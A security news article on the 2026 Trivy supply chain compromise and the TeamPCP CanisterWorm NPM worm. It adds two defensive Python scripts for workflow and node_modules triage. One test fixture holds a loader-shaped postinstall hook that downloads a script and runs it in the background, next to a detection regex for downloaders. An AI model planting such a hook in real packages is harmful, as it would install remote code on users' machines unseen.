    Aqua’s Trivy Vulnerability Scanner Hit by Supply Chain Attack

By admin, March 23, 2026

    A threat actor compromised Aqua Security’s Trivy open source vulnerability scanner in a supply chain attack that started in late February.

On March 1, Trivy’s maintainers announced that the scanner’s GitHub repository had been compromised in an attack involving a GitHub Actions workflow issue. Some releases were deleted, and malicious versions of the project’s VS Code extension were published to the Open VSX registry.

The compromise was part of a larger automated campaign that hit multiple open source repositories through their GitHub Actions workflows; in Trivy’s case it resulted in a large natural-language prompt being injected into two malicious versions of the VS Code extension.

Credentials exfiltrated during the initial incident were used last week in a new supply chain attack that targeted not only the Trivy package but also trivy-action (the GitHub Action that runs Trivy in CI) and setup-trivy (the action that installs it), Trivy’s maintainers confirmed in a March 21 advisory.

    “Following the initial disclosure on March 1, credential rotation was performed, but was not atomic (not all credentials were revoked simultaneously). The attacker could have used a valid token to exfiltrate newly rotated secrets during the rotation window (which lasted a few days),” the maintainers explain.

    The attackers used the compromised credentials to push a malicious Trivy release (version v0.69.4) that was distributed across all regular channels, including GitHub Container Registry, Amazon ECR Public, and Docker Hub.


They also force-pushed 76 of 77 trivy-action version tags to malicious commits, so any workflow that referenced the action by a version tag rather than a commit SHA silently picked up the malicious code on its next run. The payload was an information stealer that dumps the memory of the Runner.Worker process, the GitHub Actions runner component that holds the job’s secrets, and extracts all secrets from it.

    The malware was also designed to encrypt the harvested data and send it to a remote server. If the exfiltration failed, it created a public GitHub repository and uploaded the data to it.

    Additionally, the attackers targeted the setup-trivy releases, force-pushing all tags to malicious commits, leading to the same infostealer. Socket and Wiz published technical details on the attack and the malware.

    Ongoing attack

    According to Aqua, none of its commercial products that use Trivy have been affected by the attack, as “the forked version of Aqua’s commercial platform lags Trivy open source with a controlled integration process.”

    On Monday, the company warned that the attack is ongoing and evolving, with suspicious activity identified on March 22, “involving unauthorized changes and repository tampering”.

    “Based on our current understanding, this activity is consistent with the attacker’s previously observed behavior. Our investigation is actively focused on validating that all access paths have been identified and fully closed,” Aqua said.

Trivy’s maintainers released clean versions of Trivy (v0.69.2 and v0.69.3), trivy-action (v0.35.0), and setup-trivy (v0.2.6). Because the original trivy-action tags were deleted during remediation, the new releases are published under tags with a v prefix, so workflows that referenced the old tags must be updated; pinning to a full commit SHA rather than a tag avoids this class of tag tampering altogether.

They urge all users to rotate all credentials, tokens, and other secrets if a compromised version of Trivy, trivy-action, or setup-trivy ran in their environments, since the stealer takes everything present in the runner’s memory, not just Trivy-related tokens.

    “Check whether your organization pulled or executed Trivy v0.69.4 from any source. Remove any affected artifacts immediately. Look for repositories named tpcp-docs in your GitHub organization. The presence of such a repository may indicate that the fallback exfiltration mechanism was triggered and secrets were successfully stolen,” the maintainers note.
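The three checks the maintainers ask for above, plus the tag-versus-SHA pinning point behind the trivy-action and setup-trivy tag force-pushes, as an added example. This is my code, not the Trivy maintainers’, Socket’s or Wiz’s; the workflow, pull log and repository list are constructed inputs, the 40-hex SHA is a placeholder rather than a real trivy-action commit, and the action names, the version v0.69.4 and the tpcp-docs repository name are taken from the advisory as quoted on this page.

```python
"""Post-incident triage for the Trivy / trivy-action / setup-trivy compromise.

Added example; it is not code from Aqua Security, the Trivy maintainers, Socket or Wiz.
Three checks from the advisory, run over text you can collect offline:
  1. workflow files: watched actions referenced by a mutable tag instead of a
     40-hex commit SHA (tags were force-pushed; a SHA cannot be moved), and any
     `version:` input that asks for the malicious Trivy release
  2. Dockerfiles, shell history, pull logs: any reference to Trivy v0.69.4
  3. a repository list (shape of `gh repo list <org> --json name`): tpcp-docs
"""
import json
import re

WATCHED_ACTIONS = ("aquasecurity/trivy-action", "aquasecurity/setup-trivy")
MALICIOUS_TRIVY_VERSION = "0.69.4"
FALLBACK_REPO_NAME = "tpcp-docs"

USES_RE = re.compile(r"^\s*-?\s*uses:\s*([\w.-]+/[\w.-]+)(/[^@\s]*)?@(\S+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
VERSION_INPUT_RE = re.compile(r"""^\s*version:\s*['"]?v?(\d+\.\d+\.\d+)""")
STEP_START_RE = re.compile(r"^\s*-\s")
# not preceded/followed by another version digit, so 10.69.4 or 0.69.41 don't match
VERSION_TOKEN_RE = re.compile(r"(?<![0-9.])v?0\.69\.4(?![0-9.])")


def audit_workflow(text):
    """Return (line_no, action, problem) for every watched action in a workflow."""
    lines = text.splitlines()
    findings = []
    for i, line in enumerate(lines):
        m = USES_RE.match(line)
        if not m or m.group(1) not in WATCHED_ACTIONS:
            continue
        action, ref = m.group(1), m.group(3)
        if not SHA_RE.match(ref):
            findings.append((i + 1, action, f"mutable ref {ref}; pin to a full commit SHA"))
        # the step's `with:` inputs follow until the next `- ` step starts
        for j in range(i + 1, len(lines)):
            if STEP_START_RE.match(lines[j]):
                break
            vm = VERSION_INPUT_RE.match(lines[j])
            if vm and vm.group(1) == MALICIOUS_TRIVY_VERSION:
                findings.append((j + 1, action, f"requests Trivy v{MALICIOUS_TRIVY_VERSION}"))
    return findings


def find_malicious_version(text):
    """Line numbers that reference Trivy 0.69.4 in any common spelling."""
    return [n for n, line in enumerate(text.splitlines(), 1)
            if "trivy" in line.lower() and VERSION_TOKEN_RE.search(line)]


def find_fallback_repos(repo_list_json):
    """Names from a `gh repo list --json name` dump that match the drop repo name."""
    return [r["name"] for r in json.loads(repo_list_json) if r.get("name") == FALLBACK_REPO_NAME]


# --- constructed sample inputs (not real files from any organization) ---
SAMPLE_WORKFLOW = """\
name: scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install Trivy
        uses: aquasecurity/setup-trivy@v0.2.3
        with:
          version: v0.69.4
      - name: Scan
        uses: aquasecurity/trivy-action@0.28.0
        with:
          scan-type: fs
      - name: Pinned scan
        uses: aquasecurity/trivy-action@0123456789abcdef0123456789abcdef01234567
"""
# the last `uses:` above carries a placeholder SHA, not a real trivy-action commit

SAMPLE_PULLS = """\
docker pull aquasec/trivy:0.69.3
docker pull ghcr.io/aquasecurity/trivy:0.69.4
curl -sfL https://github.com/aquasecurity/trivy/releases/download/v0.69.4/trivy_0.69.4_Linux-64bit.tar.gz -o t.tgz
FROM public.ecr.aws/aquasecurity/trivy:0.69.2
"""

SAMPLE_REPOS = json.dumps([{"name": "billing-api"}, {"name": "tpcp-docs"}, {"name": "infra"}])

if __name__ == "__main__":
    for finding in audit_workflow(SAMPLE_WORKFLOW):
        print("workflow line %d: %s %s" % finding)
    print("v0.69.4 referenced on lines", find_malicious_version(SAMPLE_PULLS))
    print("fallback drop repos:", find_fallback_repos(SAMPLE_REPOS))
```

The SHA check is the durable fix: a 40-hex pin names one commit and cannot be moved by a force-push, whereas every tag in the sample would have followed the attacker’s commit. Feed `audit_workflow` every `.github/workflows/*.yml` in the organization, `find_malicious_version` shell history, Dockerfiles and registry pull logs, and `find_fallback_repos` the JSON from `gh repo list`.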

    TeamPCP’s CanisterWorm campaign

    The attack has been linked to a threat actor named TeamPCP, which has expanded its activity following the Trivy compromise, targeting the NPM ecosystem with the CanisterWorm malware.

Last week, Aikido reported that TeamPCP compromised over 45 NPM packages, injecting them with a post-install loader that fetches a persistent Python backdoor; the backdoor then retrieves payloads dynamically from an ICP (Internet Computer Protocol) canister used as a command-and-control (C&C) dead drop.

    CanisterWorm, the security firm says, can extract NPM tokens, resolve usernames, enumerate published packages, create new package versions, and publish the payload across all of them.

    It also establishes persistence, contains evasion capabilities, masquerades as PostgreSQL tooling, polls the ICP canister every 50 minutes, and can be disarmed by pointing the canister to a YouTube link.

    “If the attacker updates the canister to point to a new URL, every infected machine picks up the new binary on its next poll. The old binary keeps running in the background since the script never kills previous processes,” Aikido explains.

    The infected packages contain a standalone self-propagating tool that appears to be entirely vibe-coded and does not use obfuscation, and which uses stolen tokens to spread the malicious payload across packages.
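A check for the infection vector described above, the post-install loader, as an added example. It is my code, not Aikido’s or CanisterWorm’s: it walks a node_modules tree, lists every dependency that runs a preinstall, install or postinstall hook, and ranks first the hooks whose command looks like a downloader or an interpreter launch. The three packages in the fixture are made up (the “pg-tools-helper” name only echoes the PostgreSQL masquerade mentioned above), the token list is my heuristic rather than an indicator from the campaign, and the Internet Computer gateway domains in it are my assumption about what a canister-backed loader might contact.

```python
"""Audit a node_modules tree for packages that run code at install time.

Added example; not code from Aikido or from any package named on the page.
CanisterWorm is described as a post-install loader that fetches a Python backdoor,
so the check lists every dependency with a lifecycle hook and ranks first the
ones whose command looks like a downloader or interpreter launch. The token list
and the sample packages are my own; the IC gateway domains are an assumption.
"""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
# heuristic tokens; a native-module build like `node-gyp rebuild` triggers none of them
SUSPICIOUS_RE = re.compile(
    r"curl|wget|python3?\b|\bnode\s+-e\b|base64|chmod\s+\+x|eval\(|nohup"
    r"|https?://|\bic0\.app\b|\bicp0\.io\b",
    re.IGNORECASE,
)


def audit_node_modules(root):
    """Return one finding per lifecycle hook found under root, riskiest first."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, don't abort the audit
        scripts = pkg.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            hits = sorted({m.group(0).lower() for m in SUSPICIOUS_RE.finditer(cmd)})
            findings.append({
                "package": pkg.get("name", os.path.relpath(dirpath, root)),
                "version": pkg.get("version", "?"),
                "hook": hook,
                "command": cmd,
                "suspicious": hits,
                "high": bool(hits),
            })
    # hooks with suspicious tokens first, then alphabetical so output is stable
    return sorted(findings, key=lambda f: (not f["high"], f["package"]))


# --- constructed fixture: three made-up packages, none of them real npm names ---
FIXTURE = {
    "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0"},
    "fast-native": {"name": "fast-native", "version": "2.1.0",
                    "scripts": {"install": "node-gyp rebuild"}},
    # loader-shaped hook: fetch a script, run it in the background, hide it as "pg" tooling
    "pg-tools-helper": {"name": "pg-tools-helper", "version": "3.4.1",
                        "scripts": {"postinstall":
                                    "curl -fsSL https://example.invalid/loader.py -o /tmp/.pg && python3 /tmp/.pg &"}},
}


def write_fixture(root):
    """Materialize FIXTURE as <root>/node_modules/<pkg>/package.json files."""
    for dirname, manifest in FIXTURE.items():
        pkg_dir = os.path.join(root, "node_modules", dirname)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)


def run_demo():
    """Build the fixture in a temp dir, audit it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        write_fixture(tmp)
        return audit_node_modules(os.path.join(tmp, "node_modules"))


if __name__ == "__main__":
    for f in run_demo():
        flag = "HIGH" if f["high"] else "info"
        print(f"[{flag}] {f['package']}@{f['version']} {f['hook']}: {f['command']}  {f['suspicious']}")
```

Point `audit_node_modules` at a real project’s node_modules to see what would have run at install time; the blunt control that prevents this class of loader from executing at all is `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc), at the cost of breaking legitimate native-module builds such as the `node-gyp rebuild` hook in the fixture.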

    Financially motivated, TeamPCP emerged in late 2025, targeting cloud-native infrastructure via exposed CI/CD pipelines, Docker APIs, and Kubernetes clusters.

    The threat actor is known for mounting supply chain attacks and for leveraging credentials stolen from cloud workloads and GitHub Actions runners via memory scrapers.

